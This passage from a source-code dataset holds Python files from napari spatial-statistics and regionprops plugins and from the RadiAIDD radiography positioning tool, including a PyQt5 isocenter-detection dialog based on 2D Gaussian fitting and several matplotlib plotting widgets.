while wm._search_first_invalid_layer(w.roots()) is not None:
wm._update_invalid_layer()
```
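A minimal sketch of the decorator in action outside napari (no viewer): the wrapped function sees one frame at a time, and the decorator concatenates the per-frame tables and adds a `frame` column. The measurement function here is a hypothetical stand-in built on `skimage.measure.regionprops_table`:

```python
import numpy as np
from skimage.measure import regionprops_table
# assumed import path, matching the file header above
from napari_skimage_regionprops._all_frames import analyze_all_frames

@analyze_all_frames
def area_per_label(labels):
    # hypothetical per-frame measurement returning a dict of columns
    table = regionprops_table(labels, properties=('label', 'area'))
    return {k: list(v) for k, v in table.items()}

labels_4d = np.random.randint(0, 5, size=(3, 1, 64, 64))  # 3 timepoints, 1 z-slice
result = area_per_label(labels_4d)  # dict of columns, incl. an added 'frame' column
```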
#### File: napari-skimage-regionprops/napari_skimage_regionprops/_parametric_images.py
```python
from napari_tools_menu import register_function
import numpy
@register_function(menu="Visualization > Measurements on labels (nsr)")
def visualize_measurement_on_labels(labels_layer:"napari.layers.Labels", column:str = "label") -> "napari.types.ImageData":
labels = labels_layer.data
table = labels_layer.properties
measurements = table[column]
if isinstance(measurements, numpy.ndarray):
measurements = measurements.tolist()
try:
        import pyclesperanto_prototype as cle
        return cle.pull(cle.replace_intensities(labels, numpy.asarray([0] + measurements)))
except ImportError:
return relabel_numpy(labels, measurements)
def relabel_numpy(image, measurements):
return numpy.take(numpy.array([0] + measurements), image)
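# Hedged usage sketch for relabel_numpy (values are illustrative):
#   labels = numpy.array([[0, 1], [2, 2]])
#   relabel_numpy(labels, [10.0, 20.0])
#   -> [[ 0., 10.], [20., 20.]]   (label 0 stays background)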
``` |
{
"source": "jo-mueller/napari-spatial-statistics",
"score": 2
} |
#### File: napari_spatial_statistics/_tests/test_utils.py
```python
import numpy as np
def test_utils():
from napari_spatial_statistics._utils import adjacency_matrix_to_list_of_neighbors, \
list_of_neighbors_to_adjacency_matrix
adj_matrix = np.array([[1, 1, 0],
[1, 1, 1],
[0, 1, 1]])
lst = adjacency_matrix_to_list_of_neighbors(adj_matrix)
_adj_matrix = list_of_neighbors_to_adjacency_matrix(lst)
assert np.array_equal(adj_matrix, _adj_matrix)
def test_utils2(make_napari_viewer):
from napari_spatial_statistics._sample_data import make_random_points
from napari_spatial_statistics._utils import get_features, add_features
viewer = make_napari_viewer()
n_points = 1000
pts = make_random_points(n_classes=3, n_points=n_points)
pts = viewer.add_points(pts[0], **pts[1])
n_points = pts.data.shape[0]
props = get_features(pts)
assert 'Cell type' in list(props.keys())
new_feature = ['test'] * n_points
add_features(pts, 'new_cool_feature', new_feature)
props = get_features(pts)
assert 'new_cool_feature' in list(props.keys())
if __name__ == "__main__":
import napari
test_utils2(napari.Viewer)
```
#### File: src/napari_spatial_statistics/_utils.py
```python
import numpy as np
from napari_skimage_regionprops._table import add_table, TableWidget
from napari.layers import Points, Layer
from typing import TYPE_CHECKING
if TYPE_CHECKING:
import napari.viewer
def adjacency_matrix_to_list_of_neighbors(adj_matrix: np.ndarray):
assert adj_matrix.shape[0] == adj_matrix.shape[1]
list_of_neighbors = []
for k in range(adj_matrix.shape[0]):
list_of_neighbors.append(list(np.argwhere(adj_matrix[k] != 0).flatten()))
return list_of_neighbors
def list_of_neighbors_to_adjacency_matrix(list_of_neighbors: list):
adj_matrix = np.zeros([len(list_of_neighbors)] * 2, dtype=int)
for k, entry in enumerate(list_of_neighbors):
adj_matrix[k][np.array(entry)] = 1
return adj_matrix
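# Round-trip sketch for the two converters above (illustrative values):
#   adjacency_matrix_to_list_of_neighbors(np.eye(3, dtype=int)) -> [[0], [1], [2]]
#   list_of_neighbors_to_adjacency_matrix([[0], [1], [2]])      -> identity matrix again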
def set_features(layer, tabular_data):
if hasattr(layer, "properties"):
layer.properties = tabular_data
if hasattr(layer, "features"):
layer.features = tabular_data
def add_features(layer, key, data):
if hasattr(layer, 'properties'):
layer.properties[key] = data
if hasattr(layer, 'features'):
layer.features[key] = data
def get_features(layer, key=None):
if hasattr(layer, 'properties'):
if key is None:
return layer.properties
else:
return layer.properties[key]
if hasattr(layer, 'features'):
if key is None:
return layer.features
else:
return layer.features[key]
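# Hedged usage sketch for the feature helpers above ('intensity' is an
# illustrative key; whether `properties` or `features` is written depends
# on the napari version):
#   pts = Points(np.random.rand(10, 2))
#   add_features(pts, 'intensity', list(range(10)))
#   get_features(pts, 'intensity')  # -> [0, 1, ..., 9]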
def properties_to_table(viewer: 'napari.viewer.Viewer',
points: Points):
"""Put properties of a points layer into a table widget."""
# Convert to napari points layer
if isinstance(points, tuple):
points = Points(points[0], **points[1])
tablewidget = add_table(points, viewer)
tablewidget._view.clicked.connect(lambda: highlight_neighbors(viewer,
points,
tablewidget))
def highlight_neighbors(viewer: 'napari.viewer.Viewer',
layer: Layer,
table_widget: TableWidget):
"""Highlight neighbors of a selected point in a table widget."""
row = int(table_widget._view.currentRow())
neighbors = table_widget._table["neighbors"][row]
neighbors = np.array([int(x) for x in neighbors.split(',')]) # convert to indices
edgecolors = np.zeros((layer.data.shape[0], 4), dtype=float)
edgewidth = np.zeros(layer.data.shape[0])
edgecolors[:, -1] = 1 # set alpha to 1
edgecolors[neighbors] = [0.75, 0.75, 0.75, 1]
edgecolors[row] = [1, 1, 1, 1]
edgewidth[neighbors] = 0.75
edgewidth[row] = 0.75
layer.edge_color = edgecolors
layer.edge_width = edgewidth
from qtpy.QtWidgets import (QWidget,
                            QVBoxLayout,
                            QSizePolicy,
                            QPushButton,
                            QHBoxLayout,
                            QFileDialog)
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from matplotlib.figure import Figure
import matplotlib as mpl
COLOR='white'
mpl.rcParams['text.color'] = COLOR
mpl.rcParams['axes.labelcolor'] = COLOR
mpl.rcParams['xtick.color'] = COLOR
mpl.rcParams['ytick.color'] = COLOR
from napari_tools_menu import register_dock_widget
import numpy as np
class MplCanvas(FigureCanvas):
"""
Defines the canvas of the matplotlib window
From https://github.com/haesleinhuepf/napari-workflow-inspector/blob/main/src/napari_workflow_inspector/_dock_widget.py
"""
def __init__(self):
self.fig = Figure() # create figure
self.axes = self.fig.add_subplot(111) # create subplot
self.axes.spines['bottom'].set_color('white')
self.axes.spines['top'].set_color('white')
self.axes.spines['left'].set_color('white')
self.axes.spines['right'].set_color('white')
self.fig.patch.set_facecolor('#262930')
self.axes.set_facecolor('#262930')
self.axes.grid(which='major', linestyle='--', color='white', alpha=0.6)
self.axes.tick_params(axis='both', colors='white')
FigureCanvas.__init__(self, self.fig) # initialize canvas
FigureCanvas.setSizePolicy(self, QSizePolicy.Expanding,
QSizePolicy.Expanding)
FigureCanvas.updateGeometry(self)
class matplotlibWidget(QWidget):
"""
The matplotlibWidget class based on QWidget
"""
def __init__(self, parent=None):
QWidget.__init__(self, parent)
# save canvas and toolbar
self.canvas = MplCanvas()
self.toolbar = NavigationToolbar(self.canvas, self)
# set layout and add them to widget
self.vbl = QVBoxLayout()
self.vbl.addWidget(self.toolbar)
self.vbl.addWidget(self.canvas)
self.setLayout(self.vbl)
@register_dock_widget(menu="Visualization > Spatial statistics plot widget")
class PlotWidget(QWidget):
def __init__(self, napari_viewer):
super().__init__()
self._viewer = napari_viewer
self.plotwidget = matplotlibWidget()
self.setLayout(QVBoxLayout())
self.layout().addWidget(self.plotwidget)
self.ExportCSVButton = QPushButton('Export to csv')
self.ExportPNGButton = QPushButton('Save as png')
# widget for data export
data_export_container = QWidget()
data_export_container.setLayout(QHBoxLayout())
data_export_container.layout().addWidget(self.ExportCSVButton)
data_export_container.layout().addWidget(self.ExportPNGButton)
self.layout().addWidget(data_export_container)
self.df = None
# connect buttons
self.ExportPNGButton.clicked.connect(self.export_png)
self.ExportCSVButton.clicked.connect(self.export_csv)
    def plot_from_dataframe(self, df, xkey=None, ykey=None, **kwargs):
self.df = df
self.plotwidget.canvas.axes.clear()
if xkey is None:
x = np.arange(0, len(df), 1)
else:
x = df[xkey].to_numpy()
        if ykey is None:
            ykey = df.columns.to_list()
            if xkey is not None:
                ykey.remove(xkey)  # avoid ValueError when no x column was given
        y = df[ykey].to_numpy()
for iy in range(len(ykey)):
self.plotwidget.canvas.axes.plot(x, y[:, iy], label = ykey[iy])
self.plotwidget.canvas.axes.set(**kwargs)
self._postprocess()
self.plotwidget.canvas.draw()
def export_png(self):
filename, _ = QFileDialog.getSaveFileName(caption='Save figure to file',
filter='*.png')
        if not filename.endswith('.png'):
            filename += '.png'
self.plotwidget.canvas.axes.figure.savefig(filename, dpi=150)
def export_csv(self):
filename, _ = QFileDialog.getSaveFileName(caption='Save data to file',
filter='*.csv')
if not filename.endswith('.csv'):
filename += '.csv'
self.df.to_csv(filename)
def _postprocess(self):
self.plotwidget.canvas.axes.legend()
self.plotwidget.canvas.axes.xaxis.label.set_color('white')
self.plotwidget.canvas.axes.yaxis.label.set_color('white')
self.plotwidget.canvas.axes.grid(which='major', linestyle='--',
color='white', alpha=0.7)
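# Hedged usage sketch (names and columns are illustrative; assumes a
# running napari session):
#   widget = PlotWidget(viewer)
#   viewer.window.add_dock_widget(widget)
#   widget.plot_from_dataframe(df, xkey='frame', ykey=['area'],
#                              xlabel='frame', ylabel='area')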
``` |
{
"source": "jo-mueller/RadiAiDD",
"score": 2
} |
#### File: RadiAIDD/Backend/Children.py
```python
import matplotlib.patches as patches
from matplotlib.widgets import RectangleSelector
import numpy as np
import traceback
import logging
import tifffile
import pydicom as dcm
import scipy.optimize as opt
import matplotlib
from RadiAIDD.Backend.Containers import RadiographyImage
from RadiAIDD.Backend.UI import IsoCenter5 as IsoCenter
# import Backend.UI.Landmark5 as Landmark
from PyQt5 import QtGui
from PyQt5.QtWidgets import QMessageBox as QMessage
from PyQt5.QtWidgets import QFileDialog as Qfile
from PyQt5.QtWidgets import QMainWindow as QMain
from PyQt5.QtWidgets import QToolBar
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import Qt
import PyQt5.QtCore as QtCore
from PyQt5.QtWidgets import QInputDialog
# ------------------------
# ISOCENTER - Dialogue
# ------------------------
class IsoCenter_Child(QMain, IsoCenter.Ui_IsoCenter):
"Class that contains subroutines to define isocenter from Lynx image"
def __init__(self, parent, owner):
super(IsoCenter_Child, self).__init__()
self.Owner = owner
self.setupUi(self)
self.setStyleSheet(parent.styleSheet())
self.parent = parent
self.canvas = self.Display_IsoCenter.canvas
self.toolbar = self.canvas.toolbar
# Connect buttons
self.Button_LoadSpot.clicked.connect(self.load)
self.Button_detectIsoCenter.clicked.connect(self.drawRect)
self.Button_SetIsoCenter.clicked.connect(self.LockIsoCenter)
self.Button_Done.clicked.connect(self.Done)
# Works only after first rectangle was drawn
try:
self.Button_detectIsoCenter.clicked.connect(self.initclick)
except AttributeError:
pass
        # Flags and containers
        self.Image = None
        self.press = None
        self.rects = []
        # List for isocenter markers in canvas
        self.target_markers = []
        self.IsoCenter_flag = False
def drawRect(self):
        # Remove previous spot detections
        for item in self.target_markers:
            if isinstance(item, matplotlib.contour.QuadContourSet):
                for artist in item.collections:
                    artist.set_visible(False)
            else:
                item.set_visible(False)
# change cursor style
QApplication.setOverrideCursor(Qt.CrossCursor)
# Rectangle selector for 2d fit
rectprops = dict(facecolor='orange', edgecolor=None,
alpha=0.2, fill=True)
# drawtype is 'box' or 'line' or 'none'
self.RS = RectangleSelector(self.canvas.axes,
self.line_select_callback,
drawtype='box', rectprops=rectprops,
button=[1], # don't use middle button
minspanx=5, minspany=5,
spancoords='pixels', useblit=True,
interactive=True)
self.canvas.draw()
self.bg = self.canvas.copy_from_bbox(self.RS.ax.bbox)
self.RS.set_visible(True)
ext = (0, 4, 0, 1)
self.RS.draw_shape(ext)
# Update displayed handles
self.RS._corner_handles.set_data(*self.RS.corners)
self.RS._edge_handles.set_data(*self.RS.edge_centers)
self.RS._center_handle.set_data(*self.RS.center)
for artist in self.RS.artists:
self.RS.ax.draw_artist(artist)
artist.set_animated(False)
self.canvas.draw()
self.cid = self.canvas.mpl_connect("button_press_event",
self.initclick)
def line_select_callback(self, eclick, erelease):
x1, y1 = eclick.xdata, eclick.ydata
x2, y2 = erelease.xdata, erelease.ydata
p1 = (x1, y1)
p2 = (x2, y2)
self.spotDetect(p1, p2)
def initclick(self, evt):
self.RS.background = self.bg
self.RS.update()
for artist in self.RS.artists:
artist.set_animated(True)
self.canvas.mpl_disconnect(self.cid)
def load(self):
"load radiography image of beam IsoCenter"
# get filename from full path and display
fname = Qfile.getOpenFileName(self, 'Open file', "",
"Dicom files (*.dcm *tiff *tif)")[0]
try:
# import imagedata with regard to filetype
if fname.endswith("dcm"):
                meta = dcm.dcmread(fname)
self.Image = RadiographyImage(fname, meta.pixel_array,
meta.PixelSpacing)
elif fname.endswith("tif") or fname.endswith("tiff"):
pw, okx = QInputDialog.getDouble(self,
'Pixel Spacing',
'pixel width (mm):',
0.05, decimals=2)
self.Image = RadiographyImage(fname, tifffile.imread(fname),
pw)
self.Text_Filename.setText(fname) # display filename
self.canvas.axes.imshow(self.Image.array, cmap='gray',
zorder=1, origin='lower')
self.canvas.draw()
logging.info('{:s} imported as Isocenter'.format(fname))
except Exception:
            logging.error("{:s} could not be opened".format(fname))
self.IsoCenter_flag = False
return 0
def LockIsoCenter(self):
""" Read current values from sliders/ spot location text fields
and set as final isocenter coordinates to be used for the
actual positioning"""
self.SpotTxt_x.setStyleSheet("color: rgb(255, 0, 0);")
self.SpotTxt_y.setStyleSheet("color: rgb(255, 0, 0);")
# Raise flag for checksum check later
self.IsoCenter_flag = True
# Function to pass IsoCenter values to parent window
self.Owner.return_isocenter(self.Image,
[self.SpotTxt_x.value(),
self.SpotTxt_y.value()])
logging.info('Isocenter coordinates confirmed')
def update_crosshair(self):
"""Get value from Spinboxes and update all
markers/plots if that value is changed"""
x = self.SpotTxt_x.value()
y = self.SpotTxt_y.value()
# Update Plot Markers
self.hline.set_ydata(y)
self.vline.set_xdata(x)
# Update Plot
self.Display_IsoCenter.canvas.draw()
self.SpotTxt_x.setStyleSheet("color: rgb(0, 0, 0);")
self.SpotTxt_y.setStyleSheet("color: rgb(0, 0, 0);")
self.IsoCenter_flag = False
def spotDetect(self, p1, p2):
" Function that is invoked by ROI selection, autodetects earpin"
# Restore old cursor
QApplication.restoreOverrideCursor()
# Get ROI limits from drawn rectangle corners
x = int(min(p1[0], p2[0]) + 0.5)
y = int(min(p1[1], p2[1]) + 0.5)
width = int(np.abs(p1[0] - p2[0]) + 0.5)
height = int(np.abs(p1[1] - p2[1]) + 0.5)
subset = self.Image.array[y: y + height, x: x + width]
# Calculate fit function values
try:
popt, pcov = find_center(subset, x, y, sigma=5.0)
logging.info('Detected coordinates for isocenter:'
'x = {:2.1f}, y = {:2.1f}'.format(popt[1], popt[2]))
except Exception:
logging.error('Autodetection of Landmark in ROI failed.')
# self.TxtEarpinX.setValue(0)
# self.TxtEarpinY.setValue(0)
return 0
xx, yy, xrange, yrange = array2mesh(self.Image.array)
data_fitted = twoD_Gaussian((xx, yy), *popt)
# Print markers into image
ax = self.canvas.axes
self.target_markers.append(ax.contour(xx, yy, data_fitted.reshape(
yrange, xrange), 5))
self.target_markers.append(ax.axvline(popt[1], 0, ax.get_ylim()[1]))
self.target_markers.append(ax.axhline(popt[2], 0, ax.get_xlim()[1]))
self.canvas.draw()
self.SpotTxt_x.setValue(popt[1])
self.SpotTxt_y.setValue(popt[2])
logging.info('Coordinates of IsoCenter set to '
'x = {:.1f}, y = {:.1f}'.format(popt[1], popt[2]))
def Done(self):
"Ends IsoCenter Definition and closes Child"
# Also check whether all values were locked to main window
if not self.IsoCenter_flag:
Hint = QMessage()
Hint.setStandardButtons(QMessage.No | QMessage.Yes)
Hint.setIcon(QMessage.Information)
Hint.setText("Some values have not been locked or were modified!"
"\nProceed?")
answer = Hint.exec_()
if answer == QMessage.Yes:
self.close()
else:
self.close()
# ------------------------
# Landmark - Dialogue
# ------------------------
# class Landmark_Child(QMain, Landmark.Ui_Landmark):
# "Class that contains subroutines to define isocenter from Lynx image"
# def __init__(self, parent, Owner):
# super(Landmark_Child, self).__init__()
# self.setupUi(self)
# self.parent = parent # GUI instance
# self.Owner = Owner
# self.setStyleSheet(parent.styleSheet())
# # Data container
# self.Image = None
# # Set up plots
# self.canvas = self.Display_Landmarks.canvas
# # Connect Buttons and fields
# self.d_SourceDetector.valueChanged.connect(self.calcspacing)
# self.d_ObjectDetector.valueChanged.connect(self.calcspacing)
# # Set defaults
# self.d_SourceDetector.setValue(200.0)
# self.d_ObjectDetector.setValue(9.0)
# # Set up different segmentation procedures
# # define ROI for earpin autodetection
# self.Button_defineROI.clicked.connect(self.drawRect)
# # Buttons about earpin definition
# # Load Radiography image
# self.Button_LoadLandmark.clicked.connect(self.load)
# # set bed values and disconnect all sliders
# self.Button_accptPxSpace.clicked.connect(self.accept_spacing)
# # pass values about landmarks to parent
# self.Button_lockEarpin.clicked.connect(self.Lock_Landmarks)
# # Finish
# self.Button_Done.clicked.connect(self.Done)
# # Flags and Containers
# self.press = None
# self.rects = []
# self.target_markers = []
# self.Landmark_flag = False
# self.Spacing_flag = False
# def drawRect(self):
# # Remove previous spotdetections
# for item in self.target_markers:
# if type(item) == matplotlib.contour.QuadContourSet:
# [artist.set_visible(False) for artist in item.collections]
# else:
# item.set_visible(False)
# # change cursor style
# QApplication.setOverrideCursor(Qt.CrossCursor)
# # Rectangle selector for 2d fit
# rectprops = dict(facecolor='orange', edgecolor=None,
# alpha=0.2, fill=True)
# # drawtype is 'box' or 'line' or 'none'
# self.RS = RectangleSelector(self.canvas.axes,
# self.line_select_callback,
# drawtype='box', rectprops=rectprops,
# button=[1], # don't use middle button
# minspanx=5, minspany=5,
# spancoords='pixels', useblit=True,
# interactive=True)
# self.canvas.draw()
# self.bg = self.canvas.copy_from_bbox(self.RS.ax.bbox)
# self.RS.set_visible(True)
# ext = (0, 4, 0, 1)
# self.RS.draw_shape(ext)
# # Update displayed handles
# self.RS._corner_handles.set_data(*self.RS.corners)
# self.RS._edge_handles.set_data(*self.RS.edge_centers)
# self.RS._center_handle.set_data(*self.RS.center)
# for artist in self.RS.artists:
# self.RS.ax.draw_artist(artist)
# artist.set_animated(False)
# self.canvas.draw()
# self.cid = self.canvas.mpl_connect("button_press_event",
# self.initclick)
# def line_select_callback(self, eclick, erelease):
# x1, y1 = eclick.xdata, eclick.ydata
# x2, y2 = erelease.xdata, erelease.ydata
# p1 = (x1, y1)
# p2 = (x2, y2)
# self.pinDetect(p1, p2)
# def initclick(self, evt):
# self.RS.background = self.bg
# self.RS.update()
# for artist in self.RS.artists:
# artist.set_animated(True)
# self.canvas.mpl_disconnect(self.cid)
# def load(self):
# "load radiography image of object radiography"
# # get filename from full path and display
# fname = Qfile.getOpenFileName(self, 'Open file', "",
# "Dicom files (*.dcm *tiff *tif)")[0]
# try:
# # import imagedata with regard to filetype
# if fname.endswith("dcm"):
# meta = dcm.read_file(fname)
# self.Image = RadiographyImage(fname, meta.pixel_array,
# meta.PixelSpacing)
# elif fname.endswith("tif") or fname.endswith("tiff"):
# pw, okx = QInputDialog.getDouble(self,
# 'Pixel Spacing',
# 'pixel width (mm):',
# 0.05, decimals=2)
# self.Image = RadiographyImage(fname, tifffile.imread(fname),
# [pw, pw])
# self.Text_Filename.setText(fname) # display filename
# except:
# logging.ERROR("{:s} could not be opened".format(fname))
# self.IsoCenter_flag = False
# return 0
# self.canvas.axes.imshow(self.Image.array, cmap='gray',
# zorder=1, origin='lower')
# self.canvas.draw()
# self.calcspacing() # recalculate spacing with new image
# logging.info('{:s} imported as Isocenter Radiography'.format(fname))
# self.gettablecoords() # get motor coordinates for this image
# def gettablecoords(self):
# """Function that is called upon upload of radiography
# that prompts user to enter table coordinates"""
# x, okx = QInputDialog.getDouble(self, 'Table position: X', 'x_table:',
# 0.0, decimals=4)
# y, oky = QInputDialog.getDouble(self, 'Table position: Y', 'y_table:',
# 0.0, decimals=4)
# if not okx or not oky:
# self.parent.TableTxt_x.setText('X Value not set!!')
# self.parent.TableTxt_y.setText('Y Value not set!!')
# else:
# self.parent.TableTxt_x.setText('{:2.4f}'.format(x))
# self.parent.TableTxt_y.setText('{:2.4f}'.format(y))
# self.parent.TableTxt_x.setStyleSheet("color: #b1b1b1;")
# self.parent.TableTxt_y.setStyleSheet("color: #b1b1b1;")
# def calcspacing(self):
# """Calculate new pixel spacing based upon distances between
# Radiation source, object and detector"""
# try:
# dd = self.Image.pw[0] # pixel spacing of detector in mm
# d_OD = self.d_ObjectDetector.value()
# d_SD = self.d_SourceDetector.value()
# if d_OD != 0 and d_SD != 0:
# self.Spacing = dd*(1.0 - d_OD/d_SD) # Dreisatz
# self.LabelPixSpace.setText('Pixel Spacing: {:4.2f} mm'.format(
# self.Spacing))
# except AttributeError:
# pass
# def pinDetect(self, p1, p2):
# " Function that is invoked by ROI selection, autodetects earpin"
# # Restore old cursor
# QApplication.restoreOverrideCursor()
# # Get ROI limits from drawn rectangle corners
# x = int(min(p1[0], p2[0]) + 0.5)
# y = int(min(p1[1], p2[1]) + 0.5)
# width = int(np.abs(p1[0] - p2[0]) + 0.5)
# height = int(np.abs(p1[1] - p2[1]) + 0.5)
# # get data selection from inside the rectangle and invert
# subset = self.Image.array[y: y + height, x: x + width]
# subset = np.max(subset) - subset
# # Calculate fit function values
# try:
# popt, pcov = find_center(subset, x, y, sigma=5.0)
# logging.info('Detected coordinates for earpin: '
# 'x = {:2.1f}, y = {:2.1f}'.format(popt[1], popt[2]))
# except Exception:
# logging.error('ERROR: Autodetection of Landmark in ROI failed.')
# self.TxtEarpinX.setValue(0)
# self.TxtEarpinY.setValue(0)
# return 0
# xx, yy, xrange, yrange = array2mesh(self.Image.array)
# data_fitted = twoD_Gaussian((xx, yy), *popt)
# # Print markers into image
# ax = self.canvas.axes
# self.target_markers.append(
# ax.contour(xx, yy, data_fitted.reshape(yrange, xrange), 5))
# self.target_markers.append(ax.axvline(popt[1], 0, ax.get_ylim()[1]))
# self.target_markers.append(ax.axhline(popt[2], 0, ax.get_xlim()[1]))
# self.canvas.draw()
# self.TxtEarpinX.setValue(popt[1])
# self.TxtEarpinY.setValue(popt[2])
# logging.info('Coordinates of Radiography landmarks: '
# 'x = {:.1f}, y = {:.1f}'.format(popt[1], popt[2]))
# def accept_spacing(self):
# "Lock Spacing and disconnect sliders"
# self.d_SourceDetector.setStyleSheet("color: rgb(255, 0, 0);")
# self.d_ObjectDetector.setStyleSheet("color: rgb(255, 0, 0);")
# # Check if rectangle is still in plot
# for rect in self.rects:
# rect.remove()
# self.rects = []
# # Update Plot
# self.Display_Landmarks.canvas.draw()
# # Pass spacing to parent
# self.Owner.return_spacing(self.Spacing)
# # Raise Flag
# self.Spacing_flag = True
# # Log
# logging.info('Pixel spacing k = {:.2f} mm/px of'
# 'landmark radiography confirmed'.format(self.Spacing))
# def Lock_Landmarks(self):
# """Checks if image is X-Ray or Dicom and
# passes landmark coordinates to parent window"""
# # Paint it Red
# self.TxtEarpinX.setStyleSheet("color: rgb(255, 0, 0);")
# self.TxtEarpinY.setStyleSheet("color: rgb(255, 0, 0);")
# # Check and pass
# self.Owner.return_landmarks(self.Image,
# [self.TxtEarpinX.value(),
# self.TxtEarpinY.value()])
# # Raise Flag
# self.Landmark_flag = True
# # Log
# logging.info('Coordinates of Radiography landmarks confirmed')
# def Done(self):
# "Closses the window"
# # Check if all values have been set properly
# if False in [self.Spacing_flag, self.Landmark_flag]:
# Hint = QMessage()
# Hint.setStandardButtons( QMessage.No | QMessage.Yes)
# Hint.setIcon(QMessage.Information)
# Hint.setText("Some values have not been locked or were modified! \nProceed?")
# answer = Hint.exec_()
# if answer == QMessage.Yes: self.close()
# else:
# self.close()
def find_center(dataset, x_offset, y_offset, sigma):
""" Fit function to find IsoCenter without Sliders"""
    xx, yy, _, _ = array2mesh(dataset)
# Even background of dataset
dataset = dataset - np.median(dataset)
dataset[dataset < 0] = 0
# Calculate values for initial guess
Offset = np.median(dataset)
Amplitude = np.max(dataset) - Offset
y0, x0 = np.unravel_index(dataset.argmax(), dataset.shape)
initial_guess = [Amplitude, x0, y0, sigma, sigma, 0, Offset]
# Run Fit
popt, pcov = opt.curve_fit(twoD_Gaussian, (xx, yy), dataset.ravel(), p0=initial_guess)
    # Add the ROI offset so the fitted center refers to the full image
popt[1] += x_offset
popt[2] += y_offset
return popt, pcov
def twoD_Gaussian(xdata_tuple, amplitude, xo, yo, sigma_x, sigma_y, theta, offset):
(x, y) = xdata_tuple
xo = float(xo)
yo = float(yo)
a = (np.cos(theta)**2)/(2*sigma_x**2) + (np.sin(theta)**2)/(2*sigma_y**2)
b = -(np.sin(2*theta))/(4*sigma_x**2) + (np.sin(2*theta))/(4*sigma_y**2)
c = (np.sin(theta)**2)/(2*sigma_x**2) + (np.cos(theta)**2)/(2*sigma_y**2)
    g = offset + amplitude * np.exp(-(a * (x - xo) ** 2
                                      + 2 * b * (x - xo) * (y - yo)
                                      + c * (y - yo) ** 2))
return g.ravel()
def array2mesh(array):
    """Takes an array and returns the corresponding meshgrid."""
    try:
        yrange = np.shape(array)[0]
        xrange = np.shape(array)[1]
        # Set grid for evaluation of the fit
        x = np.linspace(0, xrange - 1, xrange)
        y = np.linspace(0, yrange - 1, yrange)
        xx, yy = np.meshgrid(x, y)
    except Exception:
        # format_exc() (unlike print_exc()) returns the traceback string;
        # re-raise so we never fall through to return undefined names
        logging.debug(traceback.format_exc())
        raise
    return xx, yy, xrange, yrange
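# Hedged, self-contained sanity check for the three helpers above (values
# are illustrative): synthesize a noiseless Gaussian and recover its center.
#   xx, yy, _, _ = array2mesh(np.zeros((50, 50)))
#   img = twoD_Gaussian((xx, yy), 100, 25, 20, 5, 5, 0, 0).reshape(50, 50)
#   popt, _ = find_center(img, x_offset=0, y_offset=0, sigma=5.0)
#   popt[1], popt[2]  # ~25.0, ~20.0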
```
#### File: RadiAIDD/Backend/matplotlibwidgetFileSmall.py
```python
try:
    from PyQt4 import QtGui
    from PyQt4.QtGui import QApplication as Qapp
    from PyQt4.QtGui import QFileDialog as Qfile
    from PyQt4.QtGui import QWidget as QWid
    from PyQt4.QtGui import QSizePolicy, QVBoxLayout
    import PyQt4.QtCore as QtCore
except ImportError:
    from PyQt5 import QtGui
    from PyQt5.QtWidgets import QApplication as Qapp
    from PyQt5.QtWidgets import QFileDialog as Qfile
    from PyQt5.QtWidgets import QWidget as QWid
    from PyQt5.QtWidgets import QSizePolicy, QVBoxLayout
    import PyQt5.QtCore as QtCore
try:
    from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
    from matplotlib.backends.backend_qt4 import NavigationToolbar2QT as NavigationToolbar
except ImportError:
    from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
    from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from matplotlib.figure import Figure
class MplCanvas(FigureCanvas):
"""
Defines the canvas of the matplotlib window
"""
def __init__(self):
self.fig = Figure() # create figure
self.axes = self.fig.add_subplot(111) # create subplot
self.fig.subplots_adjust(left=0.13, bottom=0.08, right=0.96,
top=0.92, wspace=None, hspace=None)
FigureCanvas.__init__(self, self.fig) # initialize canvas
        FigureCanvas.setSizePolicy(self, QSizePolicy.Expanding,
                                   QSizePolicy.Expanding)
FigureCanvas.updateGeometry(self)
class matplotlibWidgetSmall(QWid):
"""
The matplotlibWidget class based on QWidget
"""
def __init__(self, parent=None):
QWid.__init__(self, parent)
# save canvas and toolbar
self.canvas = MplCanvas()
self.toolbar = NavigationToolbar(self.canvas, self)
# set layout and add them to widget
        self.vbl = QVBoxLayout()
self.vbl.addWidget(self.toolbar)
self.vbl.addWidget(self.canvas)
self.setLayout(self.vbl)
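# Hedged usage sketch (illustrative; requires a Qt event loop):
#   app = Qapp([])
#   w = matplotlibWidgetSmall()
#   w.canvas.axes.plot([0, 1], [1, 0])
#   w.show()
#   app.exec_()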
```
#### File: Backend/UI/Positioning_Assistant_GUI.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Mouse_Positioning_Interface(object):
def setupUi(self, Mouse_Positioning_Interface):
Mouse_Positioning_Interface.setObjectName("Mouse_Positioning_Interface")
Mouse_Positioning_Interface.setEnabled(True)
Mouse_Positioning_Interface.resize(1708, 916)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Mouse_Positioning_Interface.sizePolicy().hasHeightForWidth())
Mouse_Positioning_Interface.setSizePolicy(sizePolicy)
Mouse_Positioning_Interface.setMinimumSize(QtCore.QSize(1708, 916))
Mouse_Positioning_Interface.setMaximumSize(QtCore.QSize(16777215, 16777215))
Mouse_Positioning_Interface.setAutoFillBackground(False)
Mouse_Positioning_Interface.setStyleSheet("")
self.centralwidget = QtWidgets.QWidget(Mouse_Positioning_Interface)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout_50 = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout_50.setObjectName("gridLayout_50")
self.splitter_4 = QtWidgets.QSplitter(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.splitter_4.sizePolicy().hasHeightForWidth())
self.splitter_4.setSizePolicy(sizePolicy)
self.splitter_4.setOrientation(QtCore.Qt.Vertical)
self.splitter_4.setObjectName("splitter_4")
self.Logo = QtWidgets.QLabel(self.splitter_4)
